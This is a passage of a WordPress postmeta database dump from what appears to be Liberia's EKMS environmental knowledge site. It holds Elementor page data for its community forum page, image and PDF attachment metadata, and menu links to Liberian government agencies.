"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18038,2658,'_edit_lock','1670325093:42'),(18039,2658,'_edit_last','42'),(18040,2659,'_wp_attached_file','2019/11/Monrovia-waste-Management.pdf'),(18041,2658,'_elementor_controls_usage','a:0:{}'),(18042,2658,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Monrovia-waste-Management.pdf'),(18043,2658,'by','Victor Emery David Jr,  Jiang Wenchaoa, Yasinta Johna, Daniel Mmerekib'),(18044,2658,'year','2019'),(18047,2658,'_pods_attached_document','a:1:{i:0;i:2659;}'),(18051,2661,'_wp_attached_file','2019/11/featured_cbd_0.jpg'),(18052,2661,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:26:\"2019/11/featured_cbd_0.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"featured_cbd_0-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"featured_cbd_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"featured_cbd_0-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"SM-N960U\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1574332870\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:18:\"0.0083333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18053,2662,'_elementor_edit_mode','builder'),(18054,2662,'_elementor_template_type','wp-page'),(18055,2662,'_elementor_version','2.7.5'),(18056,2662,'_wp_page_template','default'),(18057,2662,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.\\n\\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.\\n\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n\\nFeel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Request to Join Us<\\/span>!<\\/a>\\n\\n<strong>Added Tools to the Community:<\\/strong>\\n\\nMembers Chat (Activated)\\n\\nGroup Chatting (Activated)\\n\\nGroup online meetings hosting or Video Conferencing (In Progress)\\n\\nEvents Setup (Activated)\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(18061,2663,'_elementor_edit_mode','builder'),(18062,2663,'_elementor_template_type','wp-page'),(18063,2663,'_elementor_version','2.7.5'),(18064,2663,'_wp_page_template','default'),(18065,2663,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.<\\/p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.<\\/p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Request to Join Us<\\/span>!<\\/a><\\/p><p><strong>Added Tools to the Community:<\\/strong><\\/p><p>Members Chat (Activated)<\\/p><p>Group Chatting (Activated)<\\/p><p>Group online meetings hosting or Video Conferencing (In Progress)<\\/p><p>Events Setup (Activated)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(18071,2665,'_elementor_controls_usage','a:0:{}'),(18073,2665,'_ca_post_type','1596'),(18074,2664,'_edit_last','1'),(18075,2664,'_elementor_controls_usage','a:0:{}'),(18076,2664,'_ca_handle','0'),(18077,2664,'_ca_host','sidebar'),(18078,2664,'_ca_merge_pos','0'),(18079,2664,'_edit_lock','1574519853:1'),(18082,2667,'_wp_attached_file','2019/11/lla_logo.png'),(18083,2667,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:20:\"2019/11/lla_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"lla_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18085,2668,'_menu_item_type','custom'),(18086,2668,'_menu_item_menu_item_parent','0'),(18087,2668,'_menu_item_object_id','2668'),(18088,2668,'_menu_item_object','custom'),(18089,2668,'_menu_item_target','_blank'),(18090,2668,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18091,2668,'_menu_item_xfn',''),(18092,2668,'_menu_item_url','http://mia.gov.lr/'),(18094,2668,'_menu_item_template',''),(18095,2668,'_menu_item_mega_template','0'),(18096,2668,'_menu_item_nolink',''),(18097,2668,'_menu_item_category_post',''),(18098,2668,'_menu_item_megamenu',''),(18099,2668,'_menu_item_megamenu_auto_width',''),(18100,2668,'_menu_item_megamenu_col',''),(18101,2668,'_menu_item_megamenu_heading',''),(18102,2668,'_menu_item_megamenu_widgetarea','0'),(18103,2668,'_menu_item_icon',''),(18104,2669,'_menu_item_type','custom'),(18105,2669,'_menu_item_menu_item_parent','0'),(18106,2669,'_menu_item_object_id','2669'),(18107,2669,'_menu_item_object','custom'),(18108,2669,'_menu_item_target','_blank'),(18109,2669,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18110,2669,'_menu_item_xfn',''),(18111,2669,'_menu_item_url','http://mia.gov.lr/2content_list_sub.php?main=40&related=40&pg=mp'),(18113,2669,'_menu_item_template',''),(18114,2669,'_menu_item_mega_template','0'),(18115,2669,'_menu_item_nolink',''),(18116,2669,'_menu_item_category_post',''),(18117,2669,'_menu_item_megamenu',''),(18118,2669,'_menu_item_megamenu_auto_width',''),(18119,2669,'_menu_item_megamenu_col',''),(18120,2669,'_menu_item_megamenu_heading',''),(18121,2669,'_menu_item_megamenu_widgetarea','0'),(18122,2669,'_menu_item_icon',''),(18123,2668,'_elementor_controls_usage','a:0:{}'),(18124,2669,'_elementor_controls_usage','a:0:{}'),(18125,2671,'_elementor_controls_usage','a:0:{}'),(18127,2671,'_ca_post_type','1610'),(18128,2670,'_edit_last','1'),(18129,2670,'_elementor_controls_usage','a:0:{}'),(18130,2670,'_ca_handle','0'),(18131,2670,'_ca_host','sidebar'),(18132,2670,'_ca_merge_pos','0'),(18133,2670,'_edit_lock','1574520455:1'),(18134,2672,'_wp_attached_file','2019/11/mia_logo.png'),(18135,2672,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:197;s:4:\"file\";s:20:\"2019/11/mia_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"mia_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18137,2674,'_elementor_controls_usage','a:0:{}'),(18139,2674,'_ca_post_type','1606'),(18140,2673,'_edit_last','1'),(18141,2673,'_elementor_controls_usage','a:0:{}'),(18142,2673,'_ca_handle','0'),(18143,2673,'_ca_host','sidebar'),(18144,2673,'_ca_merge_pos','0'),(18145,2673,'_edit_lock','1574520721:1'),(18146,2675,'_menu_item_type','custom'),(18147,2675,'_menu_item_menu_item_parent','0'),(18148,2675,'_menu_item_object_id','2675'),(18149,2675,'_menu_item_object','custom'),(18150,2675,'_menu_item_target','_blank'),(18151,2675,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18152,2675,'_menu_item_xfn',''),(18153,2675,'_menu_item_url','http://www.lima.gov.lr/'),(18155,2675,'_menu_item_template',''),(18156,2675,'_menu_item_mega_template','0'),(18157,2675,'_menu_item_nolink',''),(18158,2675,'_menu_item_category_post',''),(18159,2675,'_menu_item_megamenu',''),(18160,2675,'_menu_item_megamenu_auto_width',''),(18161,2675,'_menu_item_megamenu_col',''),(18162,2675,'_menu_item_megamenu_heading',''),(18163,2675,'_menu_item_megamenu_widgetarea','0'),(18164,2675,'_menu_item_icon',''),(18165,2676,'_menu_item_type','custom'),(18166,2676,'_menu_item_menu_item_parent','0'),(18167,2676,'_menu_item_object_id','2676'),(18168,2676,'_menu_item_object','custom'),(18169,2676,'_menu_item_target','_blank'),(18170,2676,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18171,2676,'_menu_item_xfn',''),(18172,2676,'_menu_item_url','http://www.lima.gov.lr/index.php/vessel-database.html'),(18174,2676,'_menu_item_template',''),(18175,2676,'_menu_item_mega_template','0'),(18176,2676,'_menu_item_nolink',''),(18177,2676,'_menu_item_category_post',''),(18178,2676,'_menu_item_megamenu',''),(18179,2676,'_menu_item_megamenu_auto_width',''),(18180,2676,'_menu_item_megamenu_col',''),(18181,2676,'_menu_item_megamenu_heading',''),(18182,2676,'_menu_item_megamenu_widgetarea','0'),(18183,2676,'_menu_item_icon',''),(18184,2675,'_elementor_controls_usage','a:0:{}'),(18185,2676,'_elementor_controls_usage','a:0:{}'),(18186,2677,'_wp_attached_file','2019/11/lma_logo.png'),(18187,2677,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:284;s:6:\"height\";i:200;s:4:\"file\";s:20:\"2019/11/lma_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"lma_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18189,2679,'_elementor_controls_usage','a:0:{}'),(18191,2679,'_ca_post_type','1604'),(18192,2678,'_edit_last','1'),(18193,2678,'_elementor_controls_usage','a:0:{}'),(18194,2678,'_ca_handle','0'),(18195,2678,'_ca_host','sidebar'),(18196,2678,'_ca_merge_pos','0'),(18197,2678,'_edit_lock','1574521164:1'),(18198,2680,'_menu_item_type','custom'),(18199,2680,'_menu_item_menu_item_parent','0'),(18200,2680,'_menu_item_object_id','2680'),(18201,2680,'_menu_item_object','custom'),(18202,2680,'_menu_item_target','_blank'),(18203,2680,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18204,2680,'_menu_item_xfn',''),(18205,2680,'_menu_item_url','#'),(18207,2680,'_menu_item_template',''),(18208,2680,'_menu_item_mega_template','0'),(18209,2680,'_menu_item_nolink',''),(18210,2680,'_menu_item_category_post',''),(18211,2680,'_menu_item_megamenu',''),(18212,2680,'_menu_item_megamenu_auto_width',''),(18213,2680,'_menu_item_megamenu_col',''),(18214,2680,'_menu_item_megamenu_heading',''),(18215,2680,'_menu_item_megamenu_widgetarea','0'),(18216,2680,'_menu_item_icon',''),(18217,2680,'_elementor_controls_usage','a:0:{}'),(18219,2682,'_elementor_controls_usage','a:0:{}'),(18221,2682,'_ca_post_type','1598'),(18222,2681,'_edit_last','1'),(18223,2681,'_elementor_controls_usage','a:0:{}'),(18224,2681,'_ca_handle','0'),(18225,2681,'_ca_host','sidebar'),(18226,2681,'_ca_merge_pos','0'),(18227,2681,'_edit_lock','1574521456:1'),(18228,2683,'_wp_attached_file','2019/11/mot_logo.png'),(18229,2683,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:197;s:6:\"height\";i:197;s:4:\"file\";s:20:\"2019/11/mot_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"mot_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18230,2684,'_menu_item_type','custom'),(18231,2684,'_menu_item_menu_item_parent','0'),(18232,2684,'_menu_item_object_id','2684'),(18233,2684,'_menu_item_object','custom'),(18234,2684,'_menu_item_target','_blank'),(18235,2684,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18236,2684,'_menu_item_xfn',''),(18237,2684,'_menu_item_url','http://mot.gov.lr/'),(18239,2684,'_menu_item_template',''),(18240,2684,'_menu_item_mega_template','0'),(18241,2684,'_menu_item_nolink',''),(18242,2684,'_menu_item_category_post',''),(18243,2684,'_menu_item_megamenu',''),(18244,2684,'_menu_item_megamenu_auto_width',''),(18245,2684,'_menu_item_megamenu_col',''),(18246,2684,'_menu_item_megamenu_heading',''),(18247,2684,'_menu_item_megamenu_widgetarea','0'),(18248,2684,'_menu_item_icon',''),(18249,2684,'_elementor_controls_usage','a:0:{}'),(18251,2685,'_elementor_edit_mode','builder'),(18252,2685,'_elementor_template_type','wp-post'),(18253,2685,'_elementor_version','2.7.5'),(18254,2685,'_wp_page_template','default'),(18255,2685,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c87beee\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8467a48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"8e89038\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"eef1874\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(18258,2686,'_elementor_edit_mode','builder'),(18259,2686,'_elementor_template_type','wp-post'),(18260,2686,'_elementor_version','2.7.5'),(18261,2686,'_wp_page_template','default'),(18262,2686,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming 